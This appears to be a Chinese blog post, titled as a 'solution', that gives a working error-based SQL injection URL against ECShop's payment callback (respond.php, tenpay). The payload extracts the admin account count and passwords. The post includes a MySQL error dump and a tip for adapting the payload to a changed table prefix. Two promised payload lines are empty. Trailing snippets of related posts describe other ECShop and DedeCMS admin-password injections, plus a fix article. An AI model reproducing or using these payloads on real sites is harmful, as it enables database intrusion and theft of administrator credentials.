ecshop支付漏洞手工注入 解決方案

2021-05-26 11:43:47 字數 2044 閱讀 2993

原exp為

****************************************==

respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select

(select (select concat(0x7e,0x27,count(*),0x27,0x7e) from `ecs`.ecs_admin_user)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

and 1=1

****************************************==

改進方案 成功得到的返回使用者和密碼欄位的exp

暴使用者名稱:

暴密碼:

如果表字首被改如下所示:

****************************************==

mysql server error report:array ( [0] => array ( [message] => mysql query error ) [1] => array ( [sql] => select log_id from `aimeili`.`aml_pay_log` where order_id=1 and(select 1 from(select count(*),concat((select (select (select password from ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 and order_type=1 ) [2] => array ( [error] => table 'aimeili.ecs_admin_user' doesn't exist ) [3] => array ( [errno] => 1146 ) )

****************************************==

只要修改ecs_admin_user為aml_admin_user即可

ecshop 注入漏洞 利用方法 EXP

注入 購物車中一定需要有物品!登陸目標 註冊,選任意一件商品加入到購物車,然後結算,將下面的 儲存為html就可以注入了 效果如下 ropin 補充一下,如果使用不成功,注意看報錯語句 mysql server error report array 0 array message mysql que...

DedeCMS 支付頁面注入漏洞

影響版本 dodecms.官方 漏洞型別 sql注入 漏洞描述 dedecms.織夢buy action.php存在注入,可利用sql查詢 爆管理員使用者密碼。漏洞測試 爆管理帳號 member buy action.php?product member pid 1 20and 201 11 20u...

關於ECSHOP中sql注入漏洞修復

公司部署了乙個ecshop 用於做網上 使用,部署在阿里雲伺服器上,第二天收到阿里雲控制台發來的告警資訊,發現ecshop 目錄下檔案sql注入漏洞以及程式漏洞 如下圖 與技術溝通未果的情況下,網上查了點資料,對其檔案進行修復,如下修改 1,admin shopinfo.php修復方法 大概在第53...